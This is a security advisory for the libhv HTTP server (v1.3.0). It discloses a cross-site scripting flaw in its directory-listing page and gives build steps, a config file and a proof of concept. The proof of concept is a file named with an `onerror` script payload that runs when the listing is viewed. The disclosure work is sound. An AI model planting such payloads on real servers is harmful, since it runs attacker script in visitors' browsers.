Project: libhv
Tested Version: v1.3.0 (commit 579938146ff0cd99d379c038bea80d3241c5bc36)
Github Repository: https://github.com/ithewei/libhv
libhv is vulnerable to Cross-Site Scripting (XSS) when a file which name contains an XSS payload is served by the application, the filename is displayed without proper sanitiziation when is rendered (https://github.com/ithewei/libhv/blob/579938146ff0cd99d379c038bea80d3241c5bc36/http/server/http_page.cpp#L59).
Install and build the project https://github.com/ithewei/libhv#%EF%B8%8F-build
git clone https://github.com/ithewei/libhv.git
cd libhv
mkdir build
cd build
cmake ..
cmake --build .
This PoC demonstrates how it's possible to trigger an XSS if malicious content is served using libhv/bin/httpd program.
- create the following files/folders, including the file with an XSS payload (under
downloadsfolder):
mkdir poc/
cd poc/
mkdir html
mkdir html/downloads
echo "Welcome Page" > ./html/index.html
touch ./html/downloads/'"><img src=x onerror=alert(document.domain)>"'
- use the following
httpd.conffile:
# [root]
loglevel = INFO
log_remain_days = 3
log_filesize = 64M
worker_processes = auto
worker_threads = 1
worker_connections = 1024
http_port = 8080
https_port = 8443
document_root = html
home_page = index.html
index_of = /downloads/
limit_rate = 500 # KB/s
cors = yes
forward_proxy = no
- the final folder structure should be the following:
libhv/
poc/
httpd.conf
html/
index.html
downloads/
'"><img src=x onerror=alert(document.domain)>"'
- inside
pocfolder, run the following command to start thehttpdprogram
../libhv/build/bin/httpd -c ./httpd.conf
- visit
http://localhost:8080/downloads/and an alert will appear
Cross-Site Scripting (XSS)
Alessio Della Libera